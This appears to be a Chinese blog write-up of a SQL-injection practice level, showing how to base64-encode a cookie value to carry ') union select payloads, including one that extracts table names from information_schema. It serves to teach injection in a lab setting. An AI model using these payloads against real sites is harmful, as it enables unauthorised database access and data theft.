cookie注入 引号和括号闭合 base64编码

0X01

看了题目应该是 cookie注入 闭合是') 那么base64编码是什么鬼？？

看源码解决吧

https://www.cnblogs.com/yuanwanli/p/5808472.html setcookie（）函数的介绍

然后在查询比对与之前真确的时候输入的cookie是否符合

0X01构造语句进行注入

那我们的目的是将 输入的数据 通过base64解码后 变成（‘’）要填充的数据

所以直接把我们的语句先base64加密在放进去就行了  那我们来构造语句

http://tool.oschina.net/encrypt?type=3 在线编码的地址

‘) union select ,database(),#

但是好像失败了  对不是好像 是确实失败了

why？

在线url编码的工具

http://tool.chinaz.com/tools/urlencode.aspx

看这里 = 好像被url加密了 是不是我们的符号不能直接base？

尝试一下  验证一下

不是的 是我操作失误了

那我们继续回归正题

') union select 1,2,3#

这里知道 2，3 是显示位置

那我们的语句就可以从2，3下手了

这里直接演示一下爆表名

') union select 1,(select table_name from information_schema.tables where table_schema='security' limit 0,1),3#

JykgdW5pb24gc2VsZWN0IDEsKHNlbGVjdCB0YWJsZV9uYW1lIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9J3NlY3VyaXR5JyBsaW1pdCAwLDEpLDMj

成功绕过

其他的构造方法就是以此类推 学到这里了 应该不需要多讲了 所以 我们 到此 over

切记 少就是多 慢就是快

最新文章

1. Redis 安装，主从配置及Sentinel配置自动Failover
2. 初入Cocos2d-x 2.2
3. 通过Greasemonkey实现网页图片自动点击
4. 明白python文件如何组织，理解建立源文件
5. CentOS6.4下使用默认的PDF文档阅读器出现乱码的解决方案
6. 重装mysql步骤
7. 查找IP来源
8. PAT (Advanced Level) 1044. Shopping in Mars (25)
9. xampp打开显示缺少运行库的解决方法
10. C# 大数组赋值给小数组,小数组赋值给大数组
11. JAVA生成数字0~9字母A~Z混合编码0000、0001...0009、000A...000Z、0010......
12. Java实现动态修改Jar包内文件内容
13. Java的家庭记账本程序（H） ：微信小程序 image 标签，在模拟器中无法显示图片？（已解决）
14. Zabbix3.2监控Windows的内存使用百分比并在内存使用率超过85%的时候触发报警
15. okhttp 的使用
16. MSDN离线版 发现不少人都在找这个
17. Django学习笔记之Queryset的高效使用
18. 判断文本（text_to_be_present_in_element）
19. Grunt实例
20. Python——requests的安装及入门-贴吧爬虫

热门文章

1. GITFLOW流程
2. 树形DP水题系列(1):FAR-FarmCraft [POI2014][luogu P3574]
3. 带EFI支持的GRUB2安装全记录
4. python 元类 MetaClass
5. 修改jar包package目录结构操作方法
6. js 学习一 猜数字游戏
7. varchar nvarchar 设计长度时 设计成 (2^n)-1 的好处
8. install - 复制文件并设置属性
9. Ubuntu 双网卡route
10. Codeforces1203F2. Complete the Projects (hard version) （贪心+贪心+01背包）